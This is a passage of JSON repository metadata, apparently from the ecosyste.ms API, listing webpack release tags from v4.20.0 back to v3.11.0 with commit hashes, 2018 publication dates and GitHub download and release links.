webpack/tags/v4.20.0/manifests"},{"name":"v4.19.1","sha":"b7121c15e1cc810ead6aa0f4b2aad4666c072257","kind":"tag","published_at":"2018-09-18T07:56:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.19.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.1/manifests"},{"name":"v4.19.0","sha":"6bf832398c3905e06300596caddb073c583d94c4","kind":"tag","published_at":"2018-09-13T22:04:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.19.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.0/manifests"},{"name":"v4.18.1","sha":"c51a1bab94e4ff8ffca443e4fcb038bc4911e65e","kind":"tag","published_at":"2018-09-13T10:22:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.18.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.1/manifests"},{"name":"v4.18.0","sha":"ee7d9485fa30d1d3d5adbfdfb52c8f57ae8b439e","kind":"tag","published_at":"2018-09-10T15:34:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.18.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.0/manifests"},{"name":"v4.17.3","sha":"ee27d36e7cb0bed3ca32911165bbf01fef993e48","kind":"tag","published_at":"2018-09-10T14:25:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.3/manifests"},{"name":"v4.17.2","sha":"dfe6379052598a00f13bfa4f34ac73856ddf3dd0","kind":"tag","published_at":"2018-09-03T17:25:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.2/manifests"},{"name":"v4.17.1","sha":"ff3ef5eb284ddcd3da8c3f5bef6318e873779ffe","kind":"tag","published_at":"2018-08-22T09:50:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.1/manifests"},{"name":"v4.17.0","sha":"6f1f18f84dee330ec582d4e9c075c47c9a732102","kind":"tag","published_at":"2018-08-21T08:42:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.0/manifests"},{"name":"v4.16.5","sha":"025338cc91a867768325120d325b341bdcdc4321","kind":"tag","published_at":"2018-08-06T07:13:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.5/manifests"},{"name":"v4.16.4","sha":"1e9d98cb4e52a6efc58f516aa7451d1faa6347ba","kind":"tag","published_at":"2018-08-02T13:46:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.4/manifests"},{"name":"v4.16.3","sha":"482ff200303e84a65bdd5c456ce232309a6ce450","kind":"tag","published_at":"2018-07-27T10:14:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.3/manifests"},{"name":"v4.16.2","sha":"0d4c87fcf261de02a6ecfb05faab235c5a2a92dc","kind":"tag","published_at":"2018-07-23T09:51:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.2/manifests"},{"name":"v4.16.1","sha":"fa02f3d03344913f0a02d29cb363581bc8535bef","kind":"tag","published_at":"2018-07-16T08:27:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.1/manifests"},{"name":"v4.16.0","sha":"18d33c630f799e99e5e43fc0b6931713dc976529","kind":"tag","published_at":"2018-07-11T08:45:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.0/manifests"},{"name":"v4.15.1","sha":"81149be5c1cd2a3ce70c3abcc179c5070fd6dd1c","kind":"tag","published_at":"2018-07-05T13:32:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.15.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.1/manifests"},{"name":"v4.15.0","sha":"bdd4442c449b41d2a0ea7ed0de9cded3ba0e2e31","kind":"tag","published_at":"2018-07-04T19:42:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.15.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.0/manifests"},{"name":"v4.14.0","sha":"190cf7b017c9d4106c83553a1de652e53452b095","kind":"tag","published_at":"2018-06-29T12:12:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.14.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.14.0/manifests"},{"name":"v4.13.0","sha":"e3678aa3767aaeb26ebcf5e3028412bbebdb4f9f","kind":"tag","published_at":"2018-06-28T15:34:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.13.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.13.0/manifests"},{"name":"v4.12.2","sha":"c384c3fb1c162667d001f467db05e73570ddd4d2","kind":"tag","published_at":"2018-06-27T05:39:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.12.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.2/manifests"},{"name":"v4.12.1","sha":"8a7597aa6eb2eef66a8f9db3a0c49bcb96022a94","kind":"tag","published_at":"2018-06-24T08:44:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.12.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.1/manifests"},{"name":"v4.12.0","sha":"02a955b4335cb7eeeb4dd1c96ef5407c6bcea158","kind":"tag","published_at":"2018-06-08T07:24:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.0/manifests"},{"name":"v4.11.1","sha":"956c0b12dcc274f5e5725fc5abc51f805d916f43","kind":"tag","published_at":"2018-06-06T07:02:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.11.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.1/manifests"},{"name":"v4.11.0","sha":"e2fe2009d9f2b26a8d751ea89e184d6ec96e37d7","kind":"tag","published_at":"2018-06-05T11:25:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.0/manifests"},{"name":"v4.10.2","sha":"b8266d09a9472344a4894f1d8cf4067eb452019c","kind":"tag","published_at":"2018-05-30T08:29:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.10.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.2/manifests"},{"name":"v4.10.1","sha":"b80296f0c8b3907a8c96e4146bfb21746346fbb0","kind":"tag","published_at":"2018-05-29T13:38:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.10.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.1/manifests"},{"name":"v4.10.0","sha":"ba703401d580ad623af17fe96ed98b4d801e0313","kind":"tag","published_at":"2018-05-28T23:12:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.0/manifests"},{"name":"v4.9.2","sha":"317fb353518179c50342b1ac826d393a85b5903e","kind":"tag","published_at":"2018-05-28T20:28:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.9.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.2/manifests"},{"name":"v4.9.1","sha":"94cd709b06ffc7071b3505a746f0bb17fb7e3c33","kind":"tag","published_at":"2018-05-25T21:30:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.9.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.1/manifests"},{"name":"v4.9.0","sha":"bb0731d7897fb8a7369efd9d2f9bf0a8c08d546d","kind":"tag","published_at":"2018-05-25T20:17:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.0/manifests"},{"name":"v4.8.3","sha":"9a72294918064d6b976538adf808808de948585f","kind":"tag","published_at":"2018-05-12T20:56:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.3/manifests"},{"name":"v4.8.2","sha":"c92eabd3be44d4162be0affc9ef368624b0a6e51","kind":"tag","published_at":"2018-05-11T16:13:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.2/manifests"},{"name":"v3.12.0","sha":"cce33c206abaeef26d06b62102adf74a989a4696","kind":"tag","published_at":"2018-05-11T14:50:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.12.0/manifests"},{"name":"v4.8.1","sha":"2986ab1a18e895ac3f2546ac0c70bf73c0fdb679","kind":"tag","published_at":"2018-05-07T21:03:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.1/manifests"},{"name":"v4.8.0","sha":"586f9a21768e8bbc6bead6e564a6c7981a42f2d8","kind":"tag","published_at":"2018-05-07T11:39:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.0/manifests"},{"name":"v4.7.0","sha":"673c103715b5439bf72ed9767f5189b92ce7d428","kind":"tag","published_at":"2018-05-04T11:57:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.7.0/manifests"},{"name":"v4.6.0","sha":"e7c8fa414b718ac98d94a96e2553faceabfbc92f","kind":"tag","published_at":"2018-04-17T16:23:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.6.0/manifests"},{"name":"v4.5.0","sha":"e400445445a2f91d19aa8c79aa7b34b66011e661","kind":"tag","published_at":"2018-04-04T13:07:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.5.0/manifests"},{"name":"v4.4.1","sha":"0e404b8683d79052e3a6b42743bd3061f17a5a5d","kind":"tag","published_at":"2018-03-29T15:28:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.4.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.1/manifests"},{"name":"v4.4.0","sha":"e3bb8c9c8f5a30884b4df01bfbbc772cc1fb8cda","kind":"tag","published_at":"2018-03-29T14:57:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.0/manifests"},{"name":"v4.3.0","sha":"54ceb3c04d513ef5c7b78eaf4d391d14cfbe8282","kind":"tag","published_at":"2018-03-27T09:00:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.3.0/manifests"},{"name":"v4.2.0","sha":"d668a23fdc69c61ab80ec8db89a5b49778559534","kind":"tag","published_at":"2018-03-21T08:26:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.2.0/manifests"},{"name":"v4.1.1","sha":"41bb63ad69d0f32c042e74e732cb045b5966c452","kind":"tag","published_at":"2018-03-07T15:37:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.1.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.1/manifests"},{"name":"v4.1.0","sha":"f916fc0bb70585cf04a92cd99e004e4879f1d337","kind":"tag","published_at":"2018-03-04T10:39:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.0/manifests"},{"name":"v4.0.1","sha":"5044762c846a3a83a208853e48785a293fe9ef7d","kind":"tag","published_at":"2018-02-26T20:11:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.1/manifests"},{"name":"v4.0.0","sha":"213226ece261a0e89edb9de15fbc6775418f6041","kind":"tag","published_at":"2018-02-25T02:37:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0/manifests"},{"name":"v4.0.0-beta.3","sha":"4c25bfbaf2e01cf23708a381319b43367701e5b5","kind":"tag","published_at":"2018-02-24T14:55:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.3/manifests"},{"name":"v4.0.0-beta.2","sha":"2ad530e4b486c248758f6d9d94070f207ef5f2e9","kind":"tag","published_at":"2018-02-17T13:10:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.2/manifests"},{"name":"v3.11.0","sha":"bc840ec8747ba19c9e87629f2959ed2e65a9f